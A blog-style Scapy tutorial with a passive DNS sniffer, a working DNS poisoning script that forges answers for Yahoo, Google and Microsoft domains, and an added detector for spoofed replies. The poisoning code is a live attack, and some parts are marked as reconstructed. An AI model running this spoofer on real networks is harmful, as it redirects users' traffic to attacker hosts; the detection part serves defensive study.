dns sniffer / poisoning

How do you parse a DNS request and response? Scapy is a powerful tool, and it can give us the DNS details with very little code.

#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
Run the demo script with root privilege, then make two DNS queries:

    $ nslookup search.yahoo.com
    $ nslookup github.com

The DNS sniffer parses DNS requests and responses automatically:

    root:scapy/ # python scapy-dns_sniff.py
    WARNING: No route found for IPv6 destination :: (no default route?)
    [*] request: 192.168.1.108:49771 -> 192.168.1.1:53 : search.yahoo.com.
    [*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : search.yahoo.com. - ds-global.l7.search.ystg1.b.yahoo.com.
    [*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : ds-global.l7.search.ystg1.b.yahoo.com. - ds-any-global.l7.search.ysta1.b.yahoo.com.
    [*] response: 192.168.1.108:49771 <- 192.168.1.1:53 : ds-any-global.l7.search.ysta1.b.yahoo.com. - 188.125.66.104
    [*] request: 192.168.1.108:40813 -> 192.168.1.1:53 : github.com.
    [*] response: 192.168.1.108:40813 <- 192.168.1.1:53 : github.com. - 192.30.252.128

----------------------------------------------
DNS poisoning, similar to the tool called dnsspoof:

    root:scapy/ # python scapy-dns_poisoning.py
    WARNING: No route found for IPv6 destination :: (no default route?)
    [*] request: 192.168.1.107:53052 -> 192.168.1.108:53 : search.yahoo.com.
    [*] response: 192.168.1.107:53052 <- 192.168.1.108:53 : search.yahoo.com. - 192.168.1.107
    [*] request: 192.168.1.107:55815 -> 192.168.1.108:53 : 
    [*] response: 192.168.1.107:55815 <- 192.168.1.108:53 :  - 192.168.1.108
    [*] request: 192.168.1.107:37993 -> 192.168.1.108:53 : 
    [*] response: 192.168.1.107:37993 <- 192.168.1.108:53 :  - 192.168.1.109
"""
from scapy.all import IP, UDP, DNS, DNSRR, conf, send, sniff

# disable verbose mode
conf.verb = 0

# redirect domain to the special ip
posion_table = {
    'search.yahoo.com': '192.168.1.107',
    'www.google.com': '192.168.1.108',
    'www.microsoft.com': '192.168.1.109',
}


def _text(value):
    """scapy returns names as bytes on python 3; print them as str"""
    return value.decode() if isinstance(value, bytes) else value


def dns_posion(pkt):
    """poison the dns request: a queried domain in posion_table is answered with its ip"""
    # parse dns request / response packet
    if pkt and pkt.haslayer('UDP') and pkt.haslayer('DNS'):
        ip = pkt['IP']
        udp = pkt['UDP']
        dns = pkt['DNS']
        # dns query packet
        if int(udp.dport) == 53:
            qname = _text(dns.qd[0].qname)
            domain = qname[:-1].lower()   # strip the trailing dot
            print("\n[*] request: %s:%d -> %s:%d : %s" % (ip.src, udp.sport, ip.dst, udp.dport, qname))
            # match posion domain (demo, maybe not explicit)
            if domain in posion_table:
                posion_ip = posion_table[domain]
                # send a response packet to (dns request src host)
                pkt_ip = IP(src=ip.dst, dst=ip.src)
                pkt_udp = UDP(sport=udp.dport, dport=udp.sport)
                # if id is 0 (default value) ;; Warning: ID mismatch
                pkt_dns = DNS(id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=qname, rdata=posion_ip))
                print("[*] response: %s:%s <- %s:%d : %s - %s" % (pkt_ip.dst, pkt_udp.dport,
                                                                   pkt_ip.src, pkt_udp.sport,
                                                                   _text(pkt_dns.an[0].rrname),
                                                                   _text(pkt_dns.an[0].rdata)))
                send(pkt_ip / pkt_udp / pkt_dns)


# the def line of this function was lost on the page; the name dns_sniff is assumed here
def dns_sniff(pkt):
    """ parse dns request / response packet """
    if pkt and pkt.haslayer('UDP') and pkt.haslayer('DNS'):
        ip = pkt['IP']
        udp = pkt['UDP']
        dns = pkt['DNS']
        # dns query packet
        if int(udp.dport) == 53:
            qname = _text(dns.qd[0].qname)
            print("\n[*] request: %s:%d -> %s:%d : %s" % (ip.src, udp.sport, ip.dst, udp.dport, qname))
        # dns reply packet
        elif int(udp.sport) == 53:
            # dns DNSRR count (answer count)
            for i in range(dns.ancount):
                dnsrr = dns.an[i]
                print("[*] response: %s:%s <- %s:%d : %s - %s" % (ip.dst, udp.dport,
                                                                   ip.src, udp.sport,
                                                                   _text(dnsrr.rrname),
                                                                   _text(dnsrr.rdata)))


def main():
    # prn=dns_sniff gives the passive sniffer, prn=dns_posion the poisoning demo
    sniff(filter="udp port 53", prn=dns_posion)


if __name__ == "__main__":
    main()
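The script above prints every request and answer it sees, and its own comment notes that a forged reply with the wrong transaction ID is an "ID mismatch". The same two facts are what a passive monitor uses to spot a poisoning attempt. The following is an added example, not the blog's code and not part of any Scapy script: a pure-Python parser for the DNS wire format (RFC 1035, including name compression) and a detector that raises an alert when a response carries an unexpected transaction ID or when a second response to the same query carries different A records, which is what a client sees when a forged reply races the genuine one. The packets, the SpoofDetector class and its method names are constructed here; the IP addresses reuse the blog's sample values.

```python
"""Spoofed-answer detector for DNS over UDP (added example, not the blog's code).

Flags two symptoms a sniffer can see when a forged reply is injected:
  1. a response whose transaction ID does not match the client's outstanding query
     (the "ID mismatch" case), and
  2. a second response to the same query with different A records (the forged
     reply and the genuine one both reach the client).
All packets are constructed inline; addresses reuse the blog's sample values.
"""
import ipaddress
import struct


def read_name(buf, off, hops=0):
    """Decode a possibly compressed domain name at buf[off]; return (name, end_offset)."""
    labels, end = [], None
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:                      # compression pointer (RFC 1035 4.1.4)
            if hops > 16:
                raise ValueError("compression pointer loop")
            end = end if end is not None else off + 2  # the name ends after the 2-byte pointer
            off, hops = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF, hops + 1
            continue
        off += 1
        if length == 0:
            break
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", end if end is not None else off


def parse_dns(payload):
    """Return id, QR flag, question (name, type) pairs and answer (name, type, ttl, rdata) tuples."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", payload[:12])
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = read_name(payload, off)
        qtype, _ = struct.unpack("!HH", payload[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, off = read_name(payload, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        off += 10
        rdata, off = payload[off:off + rdlen], off + rdlen
        if rtype == 1 and rdlen == 4:                  # A record
            rdata = str(ipaddress.IPv4Address(rdata))
        elif rtype == 5:                               # CNAME, may itself be compressed
            rdata = read_name(payload, off - rdlen)[0]
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions, "answers": answers}


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split(".")) + b"\x00"


def build_query(txid, qname):
    """Standard recursive A query (flags: RD)."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(qname) + struct.pack("!HH", 1, 1)


def build_response(txid, qname, ip, ttl=300):
    """Response with one A record; the answer name is a pointer to the question at offset 12."""
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return hdr + encode_name(qname) + struct.pack("!HH", 1, 1) + answer


class SpoofDetector:
    def __init__(self):
        self.pending = {}    # (client_ip, client_port) -> (txid, qname) of the last query
        self.answered = {}   # (client_ip, client_port, txid) -> [(responder_ip, frozenset of A records)]

    def observe(self, src, sport, dst, dport, payload):
        """Feed one UDP datagram; return the alerts it triggers (empty list when benign)."""
        msg, alerts = parse_dns(payload), []
        if dport == 53 and not msg["is_response"]:
            self.pending[(src, sport)] = (msg["id"], msg["questions"][0][0])
        elif sport == 53 and msg["is_response"]:
            key = (dst, dport)
            expected = self.pending.get(key)
            if expected is None or expected[0] != msg["id"]:
                alerts.append("ID mismatch / unsolicited response from %s to %s:%d (id 0x%04x)"
                              % (src, dst, dport, msg["id"]))
                return alerts
            if msg["questions"] and msg["questions"][0][0] != expected[1]:
                alerts.append("question name mismatch for id 0x%04x: %s" % (msg["id"], msg["questions"][0][0]))
            records = frozenset(r[3] for r in msg["answers"] if r[1] == 1)
            seen = self.answered.setdefault(key + (msg["id"],), [])
            for prev_src, prev_records in seen:
                if prev_records != records:
                    alerts.append("conflicting answers for %s: %s from %s vs %s from %s"
                                  % (expected[1], sorted(prev_records), prev_src, sorted(records), src))
            seen.append((src, records))
        return alerts


def demo():
    """Constructed scenario: a forged reply, then the genuine one, then a reply carrying id 0."""
    det = SpoofDetector()
    client, resolver = "192.168.1.107", "192.168.1.1"
    det.observe(client, 53052, resolver, 53, build_query(0x1A2B, "search.yahoo.com"))
    forged = det.observe(resolver, 53, client, 53052, build_response(0x1A2B, "search.yahoo.com", "192.168.1.107"))
    genuine = det.observe(resolver, 53, client, 53052, build_response(0x1A2B, "search.yahoo.com", "188.125.66.104"))
    stale = det.observe(resolver, 53, client, 53052, build_response(0x0000, "search.yahoo.com", "192.168.1.109"))
    return forged, genuine, stale


if __name__ == "__main__":
    for alerts in demo():
        print(alerts or "no alert")
```

The first forged reply looks clean on its own, which is exactly why a single-packet check is not enough: the alert only fires when the genuine answer arrives a moment later with a different address, and the reply with id 0 is caught by the transaction-ID check alone. Feeding `observe()` from a Scapy `sniff()` callback means passing `ip.src`, `udp.sport`, `ip.dst`, `udp.dport` and `bytes(pkt['UDP'].payload)`.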

You get far more detail when you open blog.csdn.net: the page triggers a flood of noisy DNS requests, and the sniffer prints every one of them.

root:scapy/ # python scapy-dns_sniff.py
WARNING: No route found for IPv6 destination :: (no default route?)
[the remainder of this capture lost its addresses and ports in extraction; what survives is the sequence of queried names: c.csdnimg.cn, blog.csdn.net, static.csdn.net, csdnimg.cn, csdnim.allyes.com, www.google-analytics.com, message.csdn.net, dc.csdn.net, apps.bdimg.com, avatar.csdn.net, pagead2.googlesyndication.com, a.yunshipei.com, passport.csdn.net, dc2.csdn.net, cpro.baidustatic.com, pos.baidu.com, cpro.baidu.com, ubmcmm.baidustatic.com, cpro2.baidustatic.com, static.googleadsserving.cn, counter.csdn.net, s10-im-notify.csdn.net, ask.csdn.net, m.baidu.com, openapi.baidu.com, dup.baidustatic.com, www.csdn.net, geek.csdn.net, bbs.csdn.net, code.csdn.net, my.csdn.net, download.csdn.net, hero.csdn.net, job.csdn.net, edu.csdn.net, huiyi.csdn.net, www.csto.com, mall.csdn.net, cto.csdn.net, student.csdn.net, surveies.csdn.net, wangmeng.baidu.com, www.baidu.com, www.google.com (answered with 2404:6800:4008:c01::69) and eclick.baidu.com, with CNAME chains such as baecdn.baidu.com. and old-my.qiniudn.com. interleaved among the responses]

Dig into the rest yourself.
